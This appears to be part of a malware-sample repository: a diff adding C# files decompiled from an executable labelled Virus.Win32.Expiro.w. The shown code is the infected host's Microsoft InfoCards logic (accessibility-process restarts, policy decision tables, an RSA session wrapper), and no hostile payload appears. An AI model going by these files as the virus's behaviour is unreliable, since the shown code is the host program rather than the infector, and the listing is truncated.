using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[DebugInfoInPDB]
[NativeCppClass]
[MiscellaneousBits(65)]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HINSTANCE__
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/HWND__.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: HWND__
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
[MiscellaneousBits(65)]
[DebugInfoInPDB]
[NativeCppClass]
[StructLayout(LayoutKind.Sequential, Size = 4)]
internal struct HWND__
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IGNOREMIME.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IGNOREMIME
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[MiscellaneousBits(64)]
[DebugInfoInPDB]
[NativeCppClass]
internal enum IGNOREMIME
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IMAGE_AUX_SYMBOL_TYPE.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMAGE_AUX_SYMBOL_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[MiscellaneousBits(64)]
[NativeCppClass]
internal enum IMAGE_AUX_SYMBOL_TYPE
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IMPORT_OBJECT_NAME_TYPE.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMPORT_OBJECT_NAME_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[MiscellaneousBits(64)]
[NativeCppClass]
internal enum IMPORT_OBJECT_NAME_TYPE
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/IMPORT_OBJECT_TYPE.cs
+15
View File
@@ -0,0 +1,15 @@
// Decompiled with JetBrains decompiler
// Type: IMPORT_OBJECT_TYPE
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.VisualC;
using System.Runtime.CompilerServices;
[DebugInfoInPDB]
[NativeCppClass]
[MiscellaneousBits(64)]
internal enum IMPORT_OBJECT_TYPE
{
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AccessibilityApplicationManager.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityApplicationManager
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityApplicationManager
{
private const int WindowsVistaMajorVersion = 6;
private IAccessibilityHelper m_helper;
public AccessibilityApplicationManager()
{
bool fTabletPC = 0 != NativeMethods.GetSystemMetrics(86);
if (Environment.OSVersion.Version.Major < 6)
this.m_helper = (IAccessibilityHelper) new AccessibilityHelperForXpWin2k3(fTabletPC);
else
this.m_helper = (IAccessibilityHelper) new AccessibilityHelperForVista(fTabletPC);
}
public void Stop() => this.m_helper.Stop();
public void RestartOnInfoCardDesktop(
uint userATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
this.m_helper.RestartOnInfoCardDesktop(userATApplicationFlags, hTrustedUserToken, ref trustedUserSid, infocardDesktop, userSessionId, userProcessId, userIdentity);
}
public bool RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
return this.m_helper.RestartOnUsersDesktop(userProcessId, userDesktop, userIdentity);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AccessibilityHelperForVista.cs
+124
View File
@@ -0,0 +1,124 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityHelperForVista
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityHelperForVista : IAccessibilityHelper, IDisposable
{
private static readonly string systemPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
private static readonly string progfilePath = Environment.GetFolderPath(Environment.SpecialFolder.CommonProgramFiles);
private static readonly string baseATPath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs";
private static readonly string configPath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\Session";
private List<string> m_applicationList = new List<string>();
private ProcessManager m_manager;
private bool m_fResetConfigKey;
private int m_sessionId;
private bool m_fTabletPC;
public AccessibilityHelperForVista(bool fTabletPC)
{
this.m_fTabletPC = fTabletPC;
this.InitializeATAppData();
}
private void InitializeATAppData()
{
RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(AccessibilityHelperForVista.baseATPath);
foreach (string subKeyName in registryKey.GetSubKeyNames())
{
string str = (string) registryKey.OpenSubKey(subKeyName).GetValue("ATExe");
if (!string.IsNullOrEmpty(str))
this.m_applicationList.Add(str);
}
}
void IAccessibilityHelper.Stop()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
bool IAccessibilityHelper.RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications must be terminated before they can be restarted");
if (!this.m_fResetConfigKey)
return false;
Registry.LocalMachine.OpenSubKey(AccessibilityHelperForVista.configPath + (object) this.m_sessionId, true).SetValue("Configuration", (object) "");
this.m_fResetConfigKey = false;
return true;
}
void IAccessibilityHelper.RestartOnInfoCardDesktop(
uint userATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
using (new SystemIdentity(false))
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications are already started");
this.m_fResetConfigKey = false;
this.m_sessionId = userSessionId;
string str = userIdentity.User.Value;
for (int index = 0; index < this.m_applicationList.Count; ++index)
{
string application = this.m_applicationList[index];
Process[] processesByName = Process.GetProcessesByName(application.Substring(0, application.LastIndexOf('.')));
if (processesByName != null)
{
foreach (Process p in processesByName)
{
if (userSessionId == p.SessionId)
{
this.m_fResetConfigKey = true;
if (!Utility.KillHelper(p))
break;
break;
}
}
}
}
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
string fullPath1 = Path.Combine(AccessibilityHelperForVista.systemPath, "AtBroker.exe");
if (userATApplicationFlags != 0U)
{
bool fUseElevatedToken = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath1, "", fUseElevatedToken);
}
if (!this.m_fTabletPC)
return;
string fullPath2 = Path.Combine(AccessibilityHelperForVista.progfilePath, "microsoft shared\\ink\\tabtip.exe");
bool fUseElevatedToken1 = true;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath2, "/SeekDesktop:", fUseElevatedToken1);
}
}
public void Dispose()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AccessibilityHelperForXpWin2k3.cs
+169
View File
@@ -0,0 +1,169 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AccessibilityHelperForXpWin2k3
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.InfoCards.Diagnostics;
using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AccessibilityHelperForXpWin2k3 : IAccessibilityHelper, IDisposable
{
private const int OSKIndex = 0;
private static readonly string systemPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
private static readonly string baseRegistryPath = "\\SOFTWARE\\Microsoft\\Utility Manager\\";
private static readonly string keyName = "Start on locked desktop";
internal static AccessibilityHelperForXpWin2k3.DownlevelAtData[] atApplications = new AccessibilityHelperForXpWin2k3.DownlevelAtData[3]
{
new AccessibilityHelperForXpWin2k3.DownlevelAtData("On-Screen Keyboard", "osk.exe", "msswchx"),
new AccessibilityHelperForXpWin2k3.DownlevelAtData("Magnifier", "magnify.exe", (string) null),
new AccessibilityHelperForXpWin2k3.DownlevelAtData("Narrator", "narrator.exe", (string) null)
};
private List<int> m_restartList = new List<int>();
private ProcessManager m_manager;
private bool m_fTabletPC;
public AccessibilityHelperForXpWin2k3(bool fTabletPC) => this.m_fTabletPC = fTabletPC;
void IAccessibilityHelper.Stop()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
bool IAccessibilityHelper.RestartOnUsersDesktop(
uint userProcessId,
string userDesktop,
WindowsIdentity userIdentity)
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications must be terminated before they can be restarted");
using (new SystemIdentity(false))
{
foreach (int restart in this.m_restartList)
{
string application = Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[restart].Image);
int pid = 0;
int userHelperWrapper = (int) NativeMcppMethods.CreateProcessAsUserHelperWrapper(application, "", userProcessId, userDesktop, userIdentity.Name, ref pid);
}
}
this.m_restartList.Clear();
return false;
}
void IAccessibilityHelper.RestartOnInfoCardDesktop(
uint ATApplicationFlags,
SafeNativeHandle hTrustedUserToken,
ref string trustedUserSid,
string infocardDesktop,
int userSessionId,
uint userProcessId,
WindowsIdentity userIdentity)
{
using (new SystemIdentity(false))
{
InfoCardTrace.Assert(null == this.m_manager, "The AT applications are already started");
this.m_restartList.Clear();
bool flag1 = false;
string str = userIdentity.User.Value;
for (int index = 0; index < AccessibilityHelperForXpWin2k3.atApplications.Length; ++index)
{
using (RegistryKey registryKey = Registry.Users.OpenSubKey(str + AccessibilityHelperForXpWin2k3.baseRegistryPath + AccessibilityHelperForXpWin2k3.atApplications[index].RegistryPath))
{
bool flag2 = false;
int? nullable1 = new int?();
if (registryKey != null && RegistryValueKind.DWord == registryKey.GetValueKind(AccessibilityHelperForXpWin2k3.keyName))
nullable1 = new int?((int) registryKey.GetValue(AccessibilityHelperForXpWin2k3.keyName));
if (nullable1.HasValue)
{
int? nullable2 = nullable1;
if ((1 != nullable2.GetValueOrDefault() ? 0 : (nullable2.HasValue ? 1 : 0)) != 0)
goto label_9;
}
if (this.m_fTabletPC)
{
if (index != 0)
continue;
}
else
continue;
label_9:
foreach (Process p in Process.GetProcessesByName(AccessibilityHelperForXpWin2k3.atApplications[index].Image.Substring(0, AccessibilityHelperForXpWin2k3.atApplications[index].Image.LastIndexOf('.'))))
{
flag2 = false;
if (userSessionId == p.SessionId)
{
flag2 = true;
this.m_restartList.Add(index);
if (!Utility.KillHelper(p))
break;
break;
}
}
if (flag2 && AccessibilityHelperForXpWin2k3.atApplications[index].AdditionalImage != null)
{
foreach (Process p in Process.GetProcessesByName(AccessibilityHelperForXpWin2k3.atApplications[index].AdditionalImage))
{
if (userSessionId == p.SessionId && Utility.KillHelper(p))
break;
}
}
if (nullable1.HasValue)
{
int? nullable3 = nullable1;
if ((1 != nullable3.GetValueOrDefault() ? 0 : (nullable3.HasValue ? 1 : 0)) != 0)
{
if (ATApplicationFlags != 0U)
{
string fullPath = Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[index].Image);
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
bool fUseElevatedToken = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, fullPath, "", fUseElevatedToken);
if (index == 0)
flag1 = true;
}
}
}
}
}
if (!this.m_fTabletPC || flag1)
return;
if (this.m_manager == null)
this.m_manager = new ProcessManager(userSessionId, trustedUserSid);
bool fUseElevatedToken1 = false;
this.m_manager.AddProcess(hTrustedUserToken, ref trustedUserSid, infocardDesktop, userProcessId, userIdentity, Path.Combine(AccessibilityHelperForXpWin2k3.systemPath, AccessibilityHelperForXpWin2k3.atApplications[0].Image), "", fUseElevatedToken1);
}
}
public void Dispose()
{
if (this.m_manager == null)
return;
this.m_manager.Dispose();
this.m_manager = (ProcessManager) null;
}
internal struct DownlevelAtData
{
public string RegistryPath;
public string Image;
public string AdditionalImage;
public DownlevelAtData(string path, string image, string additional)
{
this.RegistryPath = path;
this.Image = image;
this.AdditionalImage = additional;
}
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AppliesToBehaviorDecision.cs
+16
View File
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AppliesToBehaviorDecision
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal enum AppliesToBehaviorDecision : byte
{
DoNotSend,
SendRPAppliesTo,
SendCustomAppliesTo,
FailMatch,
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AppliesToBehaviorDecisionTable.cs
+50
View File
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AppliesToBehaviorDecisionTable
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System.ServiceModel;
namespace Microsoft.InfoCards
{
internal static class AppliesToBehaviorDecisionTable
{
private static AppliesToBehaviorDecision[,] appliesToDecisionTable = new AppliesToBehaviorDecision[2, 3];
static AppliesToBehaviorDecisionTable()
{
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 0] = AppliesToBehaviorDecision.DoNotSend;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 0] = AppliesToBehaviorDecision.FailMatch;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 1] = AppliesToBehaviorDecision.DoNotSend;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 1] = AppliesToBehaviorDecision.SendRPAppliesTo;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[0, 2] = AppliesToBehaviorDecision.SendCustomAppliesTo;
AppliesToBehaviorDecisionTable.appliesToDecisionTable[1, 2] = AppliesToBehaviorDecision.SendRPAppliesTo;
}
private static AppliesToBehaviorDecision GetAppliesToBehaviorDecision(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo,
bool considerUnrecognizedElements)
{
int index = (EndpointAddress) null == policy.PolicyAppliesTo ? 0 : 1;
if (considerUnrecognizedElements)
index = policy.NonWhiteListElementsFound ? 1 : index;
return AppliesToBehaviorDecisionTable.appliesToDecisionTable[index, (int) requireAppliesTo];
}
public static AppliesToBehaviorDecision GetAppliesToBehaviorDecisionForRst(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo)
{
return AppliesToBehaviorDecisionTable.GetAppliesToBehaviorDecision(policy, requireAppliesTo, false);
}
public static AppliesToBehaviorDecision GetAppliesToBehaviorDecisionForPolicyMatch(
InfoCardPolicy policy,
RequireAppliesToStatus requireAppliesTo)
{
return AppliesToBehaviorDecisionTable.GetAppliesToBehaviorDecision(policy, requireAppliesTo, true);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/Asn1Utilities.cs
+17
View File
@@ -0,0 +1,17 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.Asn1Utilities
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
namespace Microsoft.InfoCards
{
internal class Asn1Utilities
{
private Asn1Utilities()
{
}
public static string ToHexDump(byte[] bytes) => "";
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AsymmetricCryptoSession.cs
+67
View File
@@ -0,0 +1,67 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AsymmetricCryptoSession
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using System;
using System.Diagnostics;
using System.IO;
using System.Security.Cryptography;
using System.Security.Principal;
namespace Microsoft.InfoCards
{
internal class AsymmetricCryptoSession : CryptoSession
{
private RSACryptoServiceProvider m_provider;
public AsymmetricCryptoSession(
Process process,
DateTime expirationTime,
WindowsIdentity identity,
RSACryptoServiceProvider key)
: base(process, expirationTime, identity, (object) key, CryptoSession.SessionType.Asymmetric)
{
this.m_provider = key;
}
protected override void OnWrite(BinaryWriter bwriter)
{
bwriter.Write(this.m_provider.KeySize);
Utility.SerializeString(bwriter, this.m_provider.KeyExchangeAlgorithm);
Utility.SerializeString(bwriter, this.m_provider.SignatureAlgorithm);
}
protected override void OnDispose()
{
this.m_provider.Clear();
this.m_provider.Dispose();
this.m_provider = (RSACryptoServiceProvider) null;
}
public byte[] Encrypt(bool fOAEP, byte[] inData)
{
this.ThrowIfDisposed();
return this.m_provider.Encrypt(inData, fOAEP);
}
public byte[] Decrypt(bool fOAEP, byte[] inData)
{
this.ThrowIfDisposed();
return this.m_provider.Decrypt(inData, fOAEP);
}
public byte[] SignHash(byte[] hash, string hashAlgOid)
{
this.ThrowIfDisposed();
return this.m_provider.SignHash(hash, hashAlgOid);
}
public bool VerifyHash(byte[] hash, string hashAlgOid, byte[] sig)
{
this.ThrowIfDisposed();
return this.m_provider.VerifyHash(hash, hashAlgOid, sig);
}
}
}
MSIL/Virus/Win32/E/Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d/Microsoft/InfoCards/AsyncParams.cs
+19
View File
@@ -0,0 +1,19 @@
// Decompiled with JetBrains decompiler
// Type: Microsoft.InfoCards.AsyncParams
// Assembly: infocard, Version=3.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
// MVID: ADE0A079-11DB-4A46-8BDE-D2A592CA8DEA
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Expiro.w-1f15ee7e9f7da02b6bfb4c5a5e6484eb9fa71b82d3699c54bcc7a31794b4a66d.exe
using Microsoft.Win32.SafeHandles;
namespace Microsoft.InfoCards
{
internal abstract class AsyncParams
{
private RpcAsyncResult m_asyncResult;
protected AsyncParams(ClientRequest request, string opType, SafeWaitHandle externEvent) => this.m_asyncResult = new RpcAsyncResult(request, opType, externEvent);
public RpcAsyncResult AsyncResult => this.m_asyncResult;
}
}

Some files were not shown because too many files have changed in this diff Show More